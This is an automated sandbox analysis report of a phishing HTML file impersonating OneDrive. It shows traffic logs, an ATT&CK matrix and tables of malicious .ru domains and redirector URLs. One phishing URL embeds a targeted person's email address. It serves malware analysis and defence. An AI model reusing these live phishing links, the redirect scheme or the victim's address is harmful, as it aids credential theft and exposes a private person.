Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: onedrive.live.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://h6n.xswpbsmx.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: karaokebooks.net
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: h6n.xswpbsmx.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ru
Source: global trafficDNS traffic detected: DNS query: www.onedrive.com
Source: global trafficDNS traffic detected: DNS query: onedrive.live.com
Source: global trafficDNS traffic detected: DNS query: assets.onestore.ms
Source: global trafficDNS traffic detected: DNS query: ajax.aspnetcdn.com
Source: global trafficDNS traffic detected: DNS query: c.s-microsoft.com
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1622837158:1733341834:Dc9KQflSkPZkmMEtyak2vrZSKicoXy7NaQkbVZnHHyQ/8ece78d77fea8c95/vYfNl33Oh6QHrtE.EMiOKVI5WsVZz.L4qQJn_Uj7HoA-1733343363-1.1.1.1-Vr3hLzRGqU62Jd1H5QGtItUYdGf_SlbwjkhOjzwmkcw7gVZlmEAg7_s.Fi.hyiaX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3055sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: vYfNl33Oh6QHrtE.EMiOKVI5WsVZz.L4qQJn_Uj7HoA-1733343363-1.1.1.1-Vr3hLzRGqU62Jd1H5QGtItUYdGf_SlbwjkhOjzwmkcw7gVZlmEAg7_s.Fi.hyiaXsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/15pl4/0x4AAAAAAA0qpC5c45_RMlWM/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 20:16:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6A7Qg2px6KUksXvNOjWYClXGu2aZaEH9QCjBy1XqFlPrbT2IBv5zpIVyHR8b0tuPBpOYnVpgEJ1aqDscypHjmeTtQN6H%2B50RyD%2Bcbw1Sb6SvvIvqiG3OYIf5zKk5Yg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1658&rtt_var=483&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2227&delivery_rate=2362149&cwnd=242&unsent_bytes=0&cid=cade9088320ad040&ts=38&x=0"CF-Cache-Status: MISSServer: cloudflareCF-RAY: 8ece78e99842425d-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1614&rtt_var=619&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1892&delivery_rate=1746411&cwnd=193&unsent_bytes=0&cid=fed9671ebd13e65c&ts=9664&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 20:16:10 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 2yYIs35oY40WYv3Uo0TFGQqTZ2GV+3hLR5M=$ZcW4MlnW5I9eJaLxServer: cloudflareCF-RAY: 8ece79022e0541c3-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 20:16:17 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: wtxtPXnXaRG9LQ/ms6iRVQ3Leh12TrWXvyE=$nvd3E4fJFn8djVXGcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8ece792a88e642ac-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 20:16:23 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: jWc3ZXCEuYmbUNEaXhKPdtUcWu6XwpbOvdU=$Fbn7G09IJMp7y8APServer: cloudflareCF-RAY: 8ece79549811424d-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_108.2.dr, chromecache_98.2.drString found in binary or memory: http://github.com/requirejs/almond/LICENSE
Source: chromecache_99.2.drString found in binary or memory: http://schema.org/Organization
Source: chromecache_99.2.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: chromecache_99.2.drString found in binary or memory: https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.c
Source: chromecache_99.2.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: chromecache_119.2.dr, chromecache_91.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Source: chromecache_99.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: chromecache_99.2.drString found in binary or memory: https://onedrive.live.com/about/en-us/
Source: chromecache_99.2.drString found in binary or memory: https://outlook.live.com/owa/
Source: chromecache_99.2.drString found in binary or memory: https://products.office.com/en-us/home
Source: chromecache_99.2.drString found in binary or memory: https://products.office.com/en-us/microsoft-teams/free?icid=SSM_AS_Promo_Apps_MicrosoftTeams
Source: chromecache_99.2.drString found in binary or memory: https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
Source: chromecache_99.2.drString found in binary or memory: https://www.onenote.com/
Source: chromecache_99.2.drString found in binary or memory: https://www.skype.com/en/
Source: chromecache_99.2.drString found in binary or memory: https://www.xbox.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: classification engineClassification label: mal64.phis.evad.winHTML@29/51@44/12
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Danellarealty 1052.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1856,i,3809467858696526328,4437196240526535120,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1856,i,3809467858696526328,4437196240526535120,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: https://h6n.xswpbsmx.ru/9dCP/#T#Mbsalvucci@danellarealty.comHTTP Parser: https://h6n.xswpbsmx.ru/9dCP/#T#Mbsalvucci@danellarealty.com
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting
Boot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
file:///C:/Users/user/Desktop/Danellarealty%201052.html0%Avira URL Cloudsafe
https://h6n.xswpbsmx.ru/9dCP/0%Avira URL Cloudsafe
https://h6n.xswpbsmx.ru/favicon.ico0%Avira URL Cloudsafe
https://eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ru/kNNCRuAPpzARwNvUMVngxkKlnBtlOVFKCVBSKRNJNYUETDCIVHZAXTHNFZJHUGPMWRUVXGCTFFWUZPWWUFQX100%Avira URL Cloudmalware
https://karaokebooks.net/res444.php?2-68747470733a2f2f68366e2e7873777062736d782e72752f396443502f-clover0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
karaokebooks.net
69.49.245.172
truefalse
    high
    dual-spov-0006.spov-msedge.net
    13.107.139.11
    truefalse
      high
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        h6n.xswpbsmx.ru
        172.67.164.164
        truetrue
          unknown
          code.jquery.com
          151.101.2.137
          truefalse
            high
            eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ru
            172.67.189.38
            truefalse
              unknown
              cdnjs.cloudflare.com
              104.17.25.14
              truefalse
                high
                challenges.cloudflare.com
                104.18.94.41
                truefalse
                  high
                  www.google.com
                  142.250.201.36
                  truefalse
                    high
                    www.onedrive.com
                    unknown
                    unknownfalse
                      high
                      assets.onestore.ms
                      unknown
                      unknownfalse
                        high
                        ajax.aspnetcdn.com
                        unknown
                        unknownfalse
                          high
                          c.s-microsoft.com
                          unknown
                          unknownfalse
                            high
                            onedrive.live.com
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://h6n.xswpbsmx.ru/9dCP/#T#Mbsalvucci@danellarealty.comtrue
                                unknown
                                file:///C:/Users/user/Desktop/Danellarealty%201052.htmlfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                  high
                                  https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                    high
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1622837158:1733341834:Dc9KQflSkPZkmMEtyak2vrZSKicoXy7NaQkbVZnHHyQ/8ece78d77fea8c95/vYfNl33Oh6QHrtE.EMiOKVI5WsVZz.L4qQJn_Uj7HoA-1733343363-1.1.1.1-Vr3hLzRGqU62Jd1H5QGtItUYdGf_SlbwjkhOjzwmkcw7gVZlmEAg7_s.Fi.hyiaXfalse
                                      high
                                      https://a.nel.cloudflare.com/report/v4?s=6A7Qg2px6KUksXvNOjWYClXGu2aZaEH9QCjBy1XqFlPrbT2IBv5zpIVyHR8b0tuPBpOYnVpgEJ1aqDscypHjmeTtQN6H%2B50RyD%2Bcbw1Sb6SvvIvqiG3OYIf5zKk5Yg%3D%3Dfalse
                                        high
                                        https://onedrive.live.com/false
                                          high
                                          https://karaokebooks.net/res444.php?2-68747470733a2f2f68366e2e7873777062736d782e72752f396443502f-cloverfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8ece78d77fea8c95/1733343368101/882d612e592359885fa563a9ad67aa19862c0cf04f8be5a8bd6e3205384a9319/89oKHm0hcVr6gQ_false
                                            high
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                              high
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ece78d77fea8c95&lang=autofalse
                                                high
                                                https://h6n.xswpbsmx.ru/9dCP/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ru/kNNCRuAPpzARwNvUMVngxkKlnBtlOVFKCVBSKRNJNYUETDCIVHZAXTHNFZJHUGPMWRUVXGCTFFWUZPWWUFQXfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8ece78d77fea8c95/1733343368097/Zbvu0NF-cP9MNprfalse
                                                  high
                                                  https://challenges.cloudflare.com/turnstile/v0/b/a6e12e96a2d5/api.jsfalse
                                                    high
                                                    https://h6n.xswpbsmx.ru/favicon.icofalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
                                                      high
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/15pl4/0x4AAAAAAA0qpC5c45_RMlWM/auto/fbE/normal/auto/false
                                                        high
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://outlook.live.com/owa/chromecache_99.2.drfalse
                                                          high
                                                          https://www.skype.com/en/chromecache_99.2.drfalse
                                                            high
                                                            https://products.office.com/en-us/homechromecache_99.2.drfalse
                                                              high
                                                              https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.cchromecache_99.2.drfalse
                                                                high
                                                                https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jschromecache_99.2.drfalse
                                                                  high
                                                                  https://onedrive.live.com/about/en-us/chromecache_99.2.drfalse
                                                                    high
                                                                    https://products.office.com/en-us/microsoft-teams/free?icid=SSM_AS_Promo_Apps_MicrosoftTeamschromecache_99.2.drfalse
                                                                      high
                                                                      https://www.onenote.com/chromecache_99.2.drfalse
                                                                        high
                                                                        https://www.xbox.com/chromecache_99.2.drfalse
                                                                          high
                                                                          http://schema.org/Organizationchromecache_99.2.drfalse
                                                                            high
                                                                            http://github.com/requirejs/almond/LICENSEchromecache_108.2.dr, chromecache_98.2.drfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              104.18.94.41
                                                                              challenges.cloudflare.comUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              172.67.164.164
                                                                              h6n.xswpbsmx.ruUnited States
                                                                              13335CLOUDFLARENETUStrue
                                                                              35.190.80.1
                                                                              a.nel.cloudflare.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              172.67.189.38
                                                                              eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ruUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              142.250.201.36
                                                                              www.google.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              13.107.139.11
                                                                              dual-spov-0006.spov-msedge.netUnited States
                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                              104.21.65.72
                                                                              unknownUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              69.49.245.172
                                                                              karaokebooks.netUnited States
                                                                              46606UNIFIEDLAYER-AS-1USfalse
                                                                              151.101.2.137
                                                                              code.jquery.comUnited States
                                                                              54113FASTLYUSfalse
                                                                              239.255.255.250
                                                                              unknownReserved
                                                                              unknownunknownfalse
                                                                              104.17.25.14
                                                                              cdnjs.cloudflare.comUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              IP
                                                                              192.168.2.16
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1568716
                                                                              Start date and time:2024-12-04 21:14:54 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 5m 24s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:defaultwindowshtmlcookbook.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:7
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:Danellarealty 1052.html
                                                                              Detection:MAL
                                                                              Classification:mal64.phis.evad.winHTML@29/51@44/12
                                                                              EGA Information:Failed
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 0
                                                                              • Number of non-executed functions: 0
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .html
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.17.46, 64.233.165.84, 172.217.19.170, 172.217.19.234, 172.217.17.74, 172.217.17.42, 172.217.19.202, 216.58.208.234, 142.250.181.74, 142.250.181.42, 172.217.21.14, 216.58.211.206, 20.101.246.164, 2.20.41.218, 152.199.19.160, 2.20.68.198, 2.20.68.234, 104.121.5.198, 2.20.68.235, 2.20.68.199, 2.19.201.226, 23.218.209.163, 142.250.200.195, 172.217.17.78
                                                                              • Excluded domains from analysis (whitelisted): odwebp.trafficmanager.net, odc-web-brs.onedrive.akadns.net, assets.onestore.ms.edgekey.net, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, clientservices.googleapis.com, a1449.dscg2.akamai.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, www.microsoft.com-c-3.edgekey.net, clients2.google.com, mscomajax.vo.msecnd.net, ocsp.digicert.com, redirector.gvt1.com, update.googleapis.com, img-prod-cms-rt-microsoft-com.akamaized.net, cosmic-westeurope-ns-ceb6f0ee85ee.trafficmanager.net, a1778.g2.akamai.net, optimizationguide-pa.googleapis.com, e10583.dspg.akamaiedge.net, clients1.google.com, fs.microsoft.com, accounts.google.com, odc-web-geo.onedrive.akadns.net, otelrules.azureedge.net, cs22.wpc.v0cdn.net, ctldl.windowsupdate.com, statics-marketingsites-wcus-ms-com.akamaized.net, assets.onestore.ms.akadns.net, fe3cr.delivery.mp.microsoft.com, c-s.cms.ms.akadns.net, edgedl.me.gvt1.com, c.s-microsoft.com-c.edgekey.net, e13678.dscg.akamaiedge.net, clients
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • VT rate limit hit for: Danellarealty 1052.html
                                                                              No simulations
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              13.107.139.11https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9iZVNyLndvbWdoY2NxLnJ1L1V6S2JvLw==Get hashmaliciousUnknownBrowse
                                                                                Demande de proposition du Accueil-Parrainage Outaouais.pdfGet hashmaliciousUnknownBrowse
                                                                                  https://1drv.ms/o/c/1ba8fd2bd98c98a8/EmMMbLWVyqxBh9Z6zxri2ZUBVkwUpSiY2KbvhupkdaFzGA?e=F6pNlDGet hashmaliciousUnknownBrowse
